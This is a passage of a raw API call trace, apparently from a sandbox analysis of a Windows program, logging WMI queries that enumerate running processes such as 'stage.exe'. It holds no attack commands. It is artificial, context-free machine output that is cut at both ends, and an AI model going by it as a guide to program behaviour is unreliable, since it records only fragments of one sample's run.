riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.371] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.372] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5612388) returned 0x0 [0213.372] WbemDefPath:IUnknown:QueryInterface (in: This=0x5612388, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.372] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5612388, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x560f4e0) returned 0x0 [0213.372] WbemDefPath:IUnknown:Release (This=0x5612388) returned 0x0 [0213.372] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f4e0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x560f4e0) returned 0x0 [0213.372] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f4e0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.372] WbemDefPath:IUnknown:AddRef (This=0x560f4e0) returned 0x3 [0213.372] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f4e0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.372] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f4e0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.372] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f4e0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5612398) returned 0x0 [0213.373] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5612398, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.373] WbemDefPath:IUnknown:Release (This=0x5612398) returned 0x3 [0213.373] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.373] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.373] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f4e0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.373] WbemDefPath:IUnknown:Release (This=0x560f4e0) returned 0x2 [0213.373] WbemDefPath:IUnknown:Release (This=0x560f4e0) returned 0x1 [0213.373] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.373] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.373] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f4e0, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x560f4e0) returned 0x0 [0213.373] WbemDefPath:IUnknown:AddRef (This=0x560f4e0) returned 0x3 [0213.373] WbemDefPath:IUnknown:Release (This=0x560f4e0) returned 0x2 [0213.373] WbemDefPath:IWbemPath:SetText (This=0x560f4e0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2372\"") returned 0x0 [0213.373] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.373] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.373] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.373] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.373] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.373] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.373] IWbemClassObject:Get (in: This=0x560c980, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2682c50*=0, plFlavor=0x2682c54*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="central rule.exe", varVal2=0x0), pType=0x2682c50*=8, plFlavor=0x2682c54*=0) returned 0x0 [0213.373] SysStringByteLen (bstr="central rule.exe") returned 0x20 [0213.373] SysStringByteLen (bstr="central rule.exe") returned 0x20 [0213.373] IWbemClassObject:Get (in: This=0x560c980, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2682c50*=8, plFlavor=0x2682c54*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="central rule.exe", varVal2=0x0), pType=0x2682c50*=8, plFlavor=0x2682c54*=0) returned 0x0 [0213.374] SysStringByteLen (bstr="central rule.exe") returned 0x20 [0213.374] SysStringByteLen (bstr="central rule.exe") returned 0x20 [0213.374] CoTaskMemAlloc (cb=0x4) returned 0x56123c8 [0213.374] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56123c8, puReturned=0x267acc0 | out: apObjects=0x56123c8*=0x560cb18, puReturned=0x267acc0*=0x1) returned 0x0 [0213.374] IUnknown:QueryInterface (in: This=0x560cb18, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560cb18) returned 0x0 [0213.375] IUnknown:QueryInterface (in: This=0x560cb18, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.375] IUnknown:QueryInterface (in: This=0x560cb18, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.375] IUnknown:AddRef (This=0x560cb18) returned 0x3 [0213.375] IUnknown:QueryInterface (in: This=0x560cb18, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.375] IUnknown:QueryInterface (in: This=0x560cb18, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.375] IUnknown:QueryInterface (in: This=0x560cb18, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560cb1c) returned 0x0 [0213.375] IMarshal:GetUnmarshalClass (in: This=0x560cb1c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.375] IUnknown:Release (This=0x560cb1c) returned 0x3 [0213.375] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.375] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.375] IUnknown:QueryInterface (in: This=0x560cb18, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.375] IUnknown:Release (This=0x560cb18) returned 0x2 [0213.375] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.375] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.375] IUnknown:QueryInterface (in: This=0x560cb18, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560cb18) returned 0x0 [0213.375] IUnknown:AddRef (This=0x560cb18) returned 0x4 [0213.375] IUnknown:Release (This=0x560cb18) returned 0x3 [0213.375] IUnknown:Release (This=0x560cb18) returned 0x2 [0213.375] CoTaskMemFree (pv=0x56123c8) [0213.376] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.376] IUnknown:AddRef (This=0x560cb18) returned 0x3 [0213.376] IWbemClassObject:Get (in: This=0x560cb18, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.376] IWbemClassObject:Get (in: This=0x560cb18, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2384\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.376] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2384\"") returned 0x66 [0213.376] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2384\"") returned 0x66 [0213.376] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.376] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.376] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.376] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.377] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x56123c8) returned 0x0 [0213.377] WbemDefPath:IUnknown:QueryInterface (in: This=0x56123c8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.377] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56123c8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x560f5c0) returned 0x0 [0213.377] WbemDefPath:IUnknown:Release (This=0x56123c8) returned 0x0 [0213.377] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f5c0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x560f5c0) returned 0x0 [0213.377] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f5c0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.378] WbemDefPath:IUnknown:AddRef (This=0x560f5c0) returned 0x3 [0213.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f5c0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f5c0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f5c0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x56123d8) returned 0x0 [0213.378] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56123d8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.378] WbemDefPath:IUnknown:Release (This=0x56123d8) returned 0x3 [0213.378] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.378] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f5c0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.378] WbemDefPath:IUnknown:Release (This=0x560f5c0) returned 0x2 [0213.378] WbemDefPath:IUnknown:Release (This=0x560f5c0) returned 0x1 [0213.378] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.378] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f5c0, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x560f5c0) returned 0x0 [0213.378] WbemDefPath:IUnknown:AddRef (This=0x560f5c0) returned 0x3 [0213.378] WbemDefPath:IUnknown:Release (This=0x560f5c0) returned 0x2 [0213.378] WbemDefPath:IWbemPath:SetText (This=0x560f5c0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2384\"") returned 0x0 [0213.378] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.378] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.378] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.378] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.378] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.378] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.378] IWbemClassObject:Get (in: This=0x560cb18, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26834d4*=0, plFlavor=0x26834d8*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="stage.exe", varVal2=0x0), pType=0x26834d4*=8, plFlavor=0x26834d8*=0) returned 0x0 [0213.379] SysStringByteLen (bstr="stage.exe") returned 0x12 [0213.379] SysStringByteLen (bstr="stage.exe") returned 0x12 [0213.379] IWbemClassObject:Get (in: This=0x560cb18, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26834d4*=8, plFlavor=0x26834d8*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="stage.exe", varVal2=0x0), pType=0x26834d4*=8, plFlavor=0x26834d8*=0) returned 0x0 [0213.379] SysStringByteLen (bstr="stage.exe") returned 0x12 [0213.379] SysStringByteLen (bstr="stage.exe") returned 0x12 [0213.379] CoTaskMemAlloc (cb=0x4) returned 0x5612408 [0213.379] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5612408, puReturned=0x267acc0 | out: apObjects=0x5612408*=0x560ccb0, puReturned=0x267acc0*=0x1) returned 0x0 [0213.475] IUnknown:QueryInterface (in: This=0x560ccb0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560ccb0) returned 0x0 [0213.475] IUnknown:QueryInterface (in: This=0x560ccb0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.475] IUnknown:QueryInterface (in: This=0x560ccb0, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.476] IUnknown:AddRef (This=0x560ccb0) returned 0x3 [0213.476] IUnknown:QueryInterface (in: This=0x560ccb0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.476] IUnknown:QueryInterface (in: This=0x560ccb0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.476] IUnknown:QueryInterface (in: This=0x560ccb0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560ccb4) returned 0x0 [0213.476] IMarshal:GetUnmarshalClass (in: This=0x560ccb4, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.476] IUnknown:Release (This=0x560ccb4) returned 0x3 [0213.476] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.476] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.476] IUnknown:QueryInterface (in: This=0x560ccb0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.476] IUnknown:Release (This=0x560ccb0) returned 0x2 [0213.476] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.476] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.476] IUnknown:QueryInterface (in: This=0x560ccb0, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560ccb0) returned 0x0 [0213.476] IUnknown:AddRef (This=0x560ccb0) returned 0x4 [0213.476] IUnknown:Release (This=0x560ccb0) returned 0x3 [0213.476] IUnknown:Release (This=0x560ccb0) returned 0x2 [0213.476] CoTaskMemFree (pv=0x5612408) [0213.477] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.477] IUnknown:AddRef (This=0x560ccb0) returned 0x3 [0213.477] IWbemClassObject:Get (in: This=0x560ccb0, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.477] IWbemClassObject:Get (in: This=0x560ccb0, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, 